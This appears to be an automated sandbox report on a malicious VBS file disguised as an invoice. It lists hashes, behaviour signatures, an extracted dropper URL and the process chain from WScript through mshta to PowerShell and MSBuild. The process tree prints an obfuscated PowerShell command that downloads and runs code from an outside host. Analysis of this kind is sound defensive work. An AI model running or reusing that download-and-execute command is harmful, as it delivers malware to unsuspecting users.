Analysis

  • max time kernel
    19s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    07-01-2021 07:57

General

  • Target

    invoice-ID3626307348012.vbs

  • Size

    324B

  • MD5

    50f7355426061a1952f878e61e072d5e

  • SHA1

    90156383d18b6851298d1c68f0cca24f6c7375fe

  • SHA256

    a412a3bdf6e8891fa60734b53430db5d0ac8dce28a764fd013dd767614790c45

  • SHA512

    959e8b1cc6eb2e4cf8670567f60aa496ae5af2920b40d8fa9e0705058f57e2e4a8dac029af55514c9a20d5fad4fdd951d676dcaecd33795964dee3ff0a3a5d06

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.minpic.de/k/bfqj/2ipze/

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice-ID3626307348012.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1888
    • C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://www.minpic.de/k/bfqk/14x9vi/
      2⤵
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1572
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://www.minpic.de/k/bfqj/2ipze/'))))
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          4⤵
            PID:1208
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
            4⤵
              PID:1756
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
              4⤵
                PID:1888
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                4⤵
                  PID:1540
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  4⤵
                    PID:1168

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Defense Evasion

            Modify Registry

            1
            T1112

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • memory/1572-2-0x0000000000000000-mapping.dmp
            • memory/1608-8-0x000000001AB90000-0x000000001AB91000-memory.dmp
              Filesize

              4KB

            • memory/1608-5-0x0000000000000000-mapping.dmp
            • memory/1608-6-0x000007FEF2D20000-0x000007FEF370C000-memory.dmp
              Filesize

              9.9MB

            • memory/1608-7-0x0000000001F90000-0x0000000001F91000-memory.dmp
              Filesize

              4KB

            • memory/1608-9-0x00000000025A0000-0x00000000025A1000-memory.dmp
              Filesize

              4KB

            • memory/1608-10-0x00000000025D0000-0x00000000025D1000-memory.dmp
              Filesize

              4KB

            • memory/1608-11-0x000000001B500000-0x000000001B501000-memory.dmp
              Filesize

              4KB

            • memory/1608-12-0x000000001C350000-0x000000001C351000-memory.dmp
              Filesize

              4KB

            • memory/1608-13-0x00000000026B0000-0x00000000026B7000-memory.dmp
              Filesize

              28KB

            • memory/1608-14-0x00000000026C0000-0x00000000026C8000-memory.dmp
              Filesize

              32KB

            • memory/1752-4-0x000007FEF7430000-0x000007FEF76AA000-memory.dmp
              Filesize

              2.5MB

            • memory/1888-3-0x0000000002570000-0x0000000002574000-memory.dmp
              Filesize

              16KB